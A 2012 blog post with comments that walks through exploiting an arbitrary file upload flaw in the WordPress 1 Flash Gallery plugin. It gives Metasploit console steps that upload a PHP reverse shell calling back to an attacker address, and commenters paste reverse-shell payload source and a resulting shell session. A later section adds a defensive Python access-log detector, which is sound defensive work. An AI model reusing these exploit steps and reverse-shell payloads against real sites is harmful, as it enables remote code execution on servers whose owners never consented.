Friday, 1 June 2012
WordPress 1 Flash Gallery Plugin Arbitrary File Upload Vulnerability
Secunia Advisory SA45930
Release Date 2011-09-08
The vulnerability is caused by the wp-content/plugins/1-flash-gallery/upload.php script improperly verifying uploaded files when the "action" parameter is set to "uploadify" and "fileext" is set to e.g. "php". This can be exploited to execute arbitrary PHP code by uploading a PHP file. The vulnerability is confirmed in version 1.5.6; prior versions may also be affected.
Download the exploit from http://www.exploit-db.com/exploits/17801/
Copy it to /pentest/exploits/framework3/modules/exploits/multi/http
Fix the payload /pentest/exploits/framework3/modules/payloads/singles/php/reverse_php.rb as I explained in my video.
msfconsole
use multi/http/flash_galery_wordpress
set RHOST 172.16.1.70
set URI /wordpress
set PAYLOAD php/reverse_php_airwolf
set LHOST 172.16.1.79
exploit
And that's it. Thank you guys for watching.
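The advisory describes the request shape (upload.php called with action=uploadify and fileext=php), and the meterpreter listing in the comments below shows what the dropped file looks like on disk (a 14-digit timestamp name ending in .php). As an added example, not code from the original post or from the plugin, here is a small Python detector that scans combined-format web access logs for both stages: the uploader being asked for a server-executable extension, and a later successful hit on a timestamp-named .php. It assumes "action" and "fileext" travel in the query string (so they appear in the log's request line); the log lines in SAMPLE_LOG are constructed for this example.

```python
"""Scan combined-format web access logs for 1 Flash Gallery upload.php abuse.

Added example, not code from the original post or the plugin. Assumes the
"action" and "fileext" parameters are sent in the query string (so they show
up in the request line of the access log) and that a dropped file keeps the
14-digit timestamp name seen in the post's directory listing. Every log line
in SAMPLE_LOG is constructed for this example.
"""
import re
from urllib.parse import parse_qs, urlsplit

PLUGIN_UPLOAD = "/wp-content/plugins/1-flash-gallery/upload.php"
# Extensions the web server will execute server-side; any of these in
# "fileext" means the client is asking to store a script, not an image.
EXEC_EXTS = {"php", "php3", "php4", "php5", "phtml", "phar"}
# Timestamp-style file name such as 20111011082340.php
TIMESTAMP_PHP = re.compile(r"/\d{14}\.php$")

# Apache/nginx "combined" format: ip ident user [time] "METHOD target HTTP/x" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample: a benign page view, a legitimate jpg upload, the
# malicious php upload, then two hits on the dropped timestamp-named file.
SAMPLE_LOG = """\
10.0.0.5 - - [11/Oct/2011:08:23:40 +0000] "GET /wordpress/ HTTP/1.1" 200 5120
10.0.0.9 - - [11/Oct/2011:08:23:41 +0000] "POST /wordpress/wp-content/plugins/1-flash-gallery/upload.php?action=uploadify&fileext=jpg HTTP/1.1" 200 64
10.0.0.9 - - [11/Oct/2011:08:23:42 +0000] "POST /wordpress/wp-content/plugins/1-flash-gallery/upload.php?action=uploadify&fileext=php HTTP/1.1" 200 64
10.0.0.9 - - [11/Oct/2011:08:23:43 +0000] "GET /wordpress/wp-content/uploads/20111011082340.php HTTP/1.1" 200 13
10.0.0.5 - - [11/Oct/2011:08:23:44 +0000] "GET /wordpress/wp-content/uploads/20111011082340.php HTTP/1.1" 200 13
"""


def parse_line(line):
    """Parse one combined-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    entry = m.groupdict()
    parts = urlsplit(entry["target"])
    entry["path"] = parts.path
    # Last value wins and is lowercased, so fileext=PHP is treated like fileext=php
    entry["query"] = {k: v[-1].lower() for k, v in parse_qs(parts.query).items()}
    entry["status"] = int(entry["status"])
    return entry


def detect(lines):
    """Return (kind, ip, target) findings in log order.

    UPLOADIFY    - any call to the plugin's uploader (kept for review)
    UPLOAD_PHP   - uploader call asking for a server-executable extension
    SHELL_ACCESS - a successful hit on a timestamp-named .php after an UPLOAD_PHP;
                   keyed on the sequence rather than the client IP, because the
                   dropper and the operator need not share an address
    """
    findings = []
    exec_upload_seen = False
    for line in lines:
        e = parse_line(line)
        if e is None:
            continue
        q = e["query"]
        if e["path"].endswith(PLUGIN_UPLOAD) and q.get("action") == "uploadify":
            ext = q.get("fileext", "")
            if ext in EXEC_EXTS:
                exec_upload_seen = True
                findings.append(("UPLOAD_PHP", e["ip"], e["target"]))
            else:
                findings.append(("UPLOADIFY", e["ip"], e["target"]))
        elif (exec_upload_seen and 200 <= e["status"] < 300
              and TIMESTAMP_PHP.search(e["path"])):
            findings.append(("SHELL_ACCESS", e["ip"], e["target"]))
    return findings


if __name__ == "__main__":
    for kind, ip, target in detect(SAMPLE_LOG.splitlines()):
        print(f"{kind:12} {ip:15} {target}")
```

Run it against a real access.log with `detect(open("access.log").read().splitlines())`. The UPLOADIFY finding is deliberately noisy: the uploader is also how legitimate gallery images arrive, so only UPLOAD_PHP and SHELL_ACCESS are worth alerting on; UPLOADIFY is there so a responder can see the full sequence from one client.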
Hi bro, is the airwolf reverse shell public?
Send me the link plz.
airwolf_reverse shell link plz bro
I'm trying to start the exploit but it outputs the following error:
msf exploit(flash_galery_wordpress) > exploit
[*] Started reverse handler on 192.168.1.3:4444
[*] Successfully uploaded shell.
[*] Trying to access shell at ...
[-] Exploit exception: can't convert nil into String
[*] Exploit completed, but no session was created.
msf exploit(flash_galery_wordpress) >
Please tell me what's wrong.
What is the payload you are trying to use?
Hi Angelo, one question.
You modified the payload reverse_php.rb in /../payloads/singles/php, but you copy/pasted the exploit into this file at this line:
shell=<<-END_OF_PHP_CODE
END_OF_PHP_CODE
but the modified code is different from what I see...
I'll show you my code:
def php_reverse_shell
  if (!datastore['LHOST'] or datastore['LHOST'].empty?)
    # datastore is empty on msfconsole startup
    ipaddr = '127.0.0.1'
    port = 4444
  else
    ipaddr = datastore['LHOST']
    port = datastore['LPORT']
  end
  exec_funcname = Rex::Text.rand_text_alpha(rand(10)+5)
  uri = "tcp://#{ipaddr}"
  socket_family = "AF_INET"
  if Rex::Socket.is_ipv6?(ipaddr)
    uri = "tcp://[#{ipaddr}]"
    socket_family = "AF_INET6"
  end
  shell=<<-END_OF_PHP_CODE
-----------------o----------------
Your code does not show this at the beginning.
Show us your code.
Thx
Metasploit upgraded those payloads, but they still don't work.
I just tested it now and you can use this payload: php/meterpreter/bind_tcp
Once you get your meterpreter session, just type "shell" and hit enter; you will get your shell.
EX:
meterpreter > shell
Process 15882 created.
Channel 0 created.
id
uid=48(apache) gid=48(apache) groups=48(apache)
ls
20111011082340.php
the flash gallery is nice
awesome post buddy